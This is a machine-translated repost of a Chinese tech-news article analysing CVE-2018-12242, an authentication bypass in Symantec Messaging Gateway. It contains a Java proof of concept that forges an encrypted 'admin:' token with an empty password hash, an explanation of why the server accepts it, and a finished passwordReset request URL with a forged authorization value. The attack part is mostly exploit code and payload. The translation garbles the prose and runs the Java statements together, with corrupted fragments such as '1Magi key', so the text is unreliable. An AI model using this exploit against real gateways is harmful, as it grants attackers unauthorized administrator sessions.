Shulou(Shulou.com)05/31 Report--

How to achieve CVE-2018-12242 vulnerability analysis, I believe that many inexperienced people do not know what to do. Therefore, this paper summarizes the causes and solutions of the problem. Through this article, I hope you can solve this problem.

CVE-2018-12242

He had the source code of symantec in his hand, so he immediately analyzed the existence of it and didn't move it.

Go to poc first.

Import java.security.SecureRandom;import javax.crypto.Cipher;import javax.crypto.SecretKey;import javax.crypto.SecretKeyFactory;import javax.crypto.spec.PBEKeySpec;import javax.crypto.spec.PBEParameterSpec;import sun.misc.BASE64Encoder;public class Test {publicstatic void main (String args []) {try {/ / System.out.print (123); byte [] salt = new byte [8] SecureRandomrandom = SecureRandom.getInstance ("SHA1PRNG"); random.nextBytes (salt); PBEKeySpeckeySpec = newPBEKeySpec ("abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ,./?;':\"\ {} `~! @ # $% ^ & * () _ +-= ".toCharArray ()); SecretKeyFactorykeyFactory = SecretKeyFactory.getInstance (" PBEWithMD5AndDES "); SecretKeykey = keyFactory.generateSecret (keySpec) PBEParameterSpecparamSpec = new PBEParameterSpec (salt, 1000); Ciphercipher = Cipher.getInstance ("PBEWithMD5AndDES"); cipher.init (1Magi key, paramSpec); / / byte [] salt; BASE64Encoderencoder = new BASE64Encoder (); StringsaltString = encoder.encode (salt) Stringtext = "admin:"; byte [] ciphertext = cipher.doFinal (text.getBytes ()); StringciphertextString = encoder.encode (ciphertext); System.out.print (saltString+ ciphertextString);} catch (Exception e) {System.out.print (e);}

The core is still encrypting and decrypting this piece.

The encryption algorithm is always fixed.

But the FIPS186PRNG algorithm is too old.

SHA1PRNG can only be used instead.

Next, analyze a wave of vulnerability triggers.

Token = BrightmailDecrypt.decrypt (token)

The token is received and decrypted by public decryption method.

Press ":" after decryption

The front of the split is username, followed by passwordhash.

Then press username to do the sql query.

Then call the getAdministratorUserByName method

GetSQLAdministratorUserByName generates sql statements

And then query.

And then compare.

If user is empty, an exception is thrown that does not exist for the user.

If the passwordhash is inconsistent with the queried passwordhash, an exception will be thrown.

So what is passwordhash?

This field is blank when the reset password option is turned on.

Then create a normal operation of admin session. .

So the final payload is

/ brightmail/action2.do?method=passwordReset&authorization=S9m%2bdmCBN8k%3dfot%2fxYG299k%3d

After reading the above, have you mastered how to implement CVE-2018-12242 vulnerability analysis? If you want to learn more skills or want to know more about it, you are welcome to follow the industry information channel, thank you for reading!

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.